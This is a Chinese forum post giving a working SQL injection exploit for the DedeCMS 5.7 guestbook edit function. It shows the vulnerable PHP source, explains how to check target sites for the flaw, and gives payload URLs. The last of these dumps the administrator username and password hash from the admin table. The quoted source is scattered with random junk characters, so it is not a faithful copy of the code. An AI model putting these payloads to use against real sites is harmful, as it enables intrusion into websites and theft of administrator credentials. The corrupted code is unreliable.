dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7

漏洞文件edit.inc.php具体代码：
- P% @2 J! N& K3 U$ U1 R& M
< ?php  

; F- j9 g% g' ]/ Q$ w, Z. Y, \if(!defined('DEDEINC')) exit('Request Error!');  

   

8 ~. B/ j1 U9 ?+ Xif(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  
( h; d" x: x& r
else $GUEST_BOOK_POS = "guestbook.php";  

- q0 A& h0 U- k7 X) u5 d+ D! ~9 ?   
! ~" U0 y3 |7 K9 X  H
$id = intval($id);  

- R! w) U( c0 gif(empty($job)) $job='view';  
8 o8 X4 B; a0 l
   
! [6 V" t) a) \" ?7 K
$ b! j  q! q5 C) e0 _& k* S) Kif($job=='del' && $g_isadmin)  
/ ?# Q& o* ]4 k9 e+ D
{  

( z  k( }0 T8 c  ^  ]8 w$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  

8 ~: ~& e! ]4 n( n, YShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  

) d% P8 C5 x; |! _exit();  

* V0 k8 B4 M% ]/ U}  
( S: o( W* }7 _  B/ p
else if($job=='check' && $g_isadmin)  
4 N) ]7 T# x3 k6 E2 v
) o8 z; _$ D: J{  

$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  
6 g$ b0 s4 y4 z
ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  

6 d0 t* [" M. `% J: e: [; @1 dexit();  
' s8 ?' O8 |8 \% g' A
* }% @+ y( f# ~0 c}  

0 u/ m9 g* u8 d1 o' r; Aelse if($job=='editok')  

5 i6 Y( t1 S# p" q& A$ P+ i{  

$remsg = trim($remsg);  
- f; b  P8 r, U, G, z% g7 b1 w) }+ @
5 c4 A2 c2 c2 w  t$ D3 R7 L  fif($remsg!='')  
7 s! @" e  {& ~0 E
" f6 L- ]) O' E6 h7 \3 W{  
. ?- Q( _  ]0 C/ q7 c6 f
. Q  G5 U- J) n' l//管理员回复不过滤HTML By:Errorera blog:errs.cc  

if($g_isadmin)  

0 m0 M! t, Y! a0 U& B{  

5 Q6 A4 O0 F; D& E+ l# `$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  

//$remsg <br /><font color=red>管理员回复：</font> }  
7 ~' ]9 f& @- f& l' K) x7 ?
else
  k  _9 j. j) D4 N" Q9 _2 y; J
, W' Z" Z, h6 k7 }4 s0 F{  

1 g4 ^" S" g6 l+ D0 U5 k( M5 v$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  
5 l4 O9 x/ h+ X1 C
$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  
" R* M/ k: g" L% M+ I
$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  

$msg = $oldmsg.$remsg;  
0 a' i' f$ }4 n% ^$ I& \) W8 |0 t
3 c9 V  Q( J' O3 @}  
6 a; P6 c) w& P/ M" y. v6 Q
}  
3 Y0 e; R' i1 V7 ~. m9 s4 J
//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  

$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  
* {" I+ T) a$ m' k3 V. s5 e) ^
ShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  

, r; _5 T- i) S, q0 k$ uexit();  

3 I- g2 f# {0 r7 a" |}  

//home:www.errs.cc  

if($g_isadmin)  

{  

$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  
( _9 j4 c! S1 p" x* {, C# ?7 T
) B% A/ X. G" M# m" {; W. }require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  
. [- n9 ~' n, I4 z7 f9 Y2 G
}  
8 d/ D5 u7 t1 }' N* R
else

+ M7 |6 G5 G" E{  

$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  
$ x1 Z" m5 B. R+ A$ h
" r/ w: B; N, ~, G6 g& w) c  Xrequire_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  
9 E9 n1 }( @& p7 n& A+ ?% t' ?- `
% S, a; R! ^7 C- p( b5 O3 S} 漏洞成功需要条件：
1. php magic_quotes_gpc=off
2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。
& A3 W$ _7 M2 e5 C
怎么判断是否存在漏洞：
先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
- ?' K5 a  e7 S) q2 {+ J7 K然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
访问：

www.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证
- t) G8 Z4 A4 Z/ S9 F! k; X
) W+ a$ `6 Q4 a! I* t7 n) b' d
/ w7 T( W8 w. v' K$ D明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问
; k. J) s) i! R/ c9 a
www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().
. b" W4 E; E' L& w0 {# i8 p
6 b( x% q! s: ~/ z5 C6 P大概利用就是这样，大家有兴趣的多研究下！！

最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！

/ u) M& y9 H: h8 Uview sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='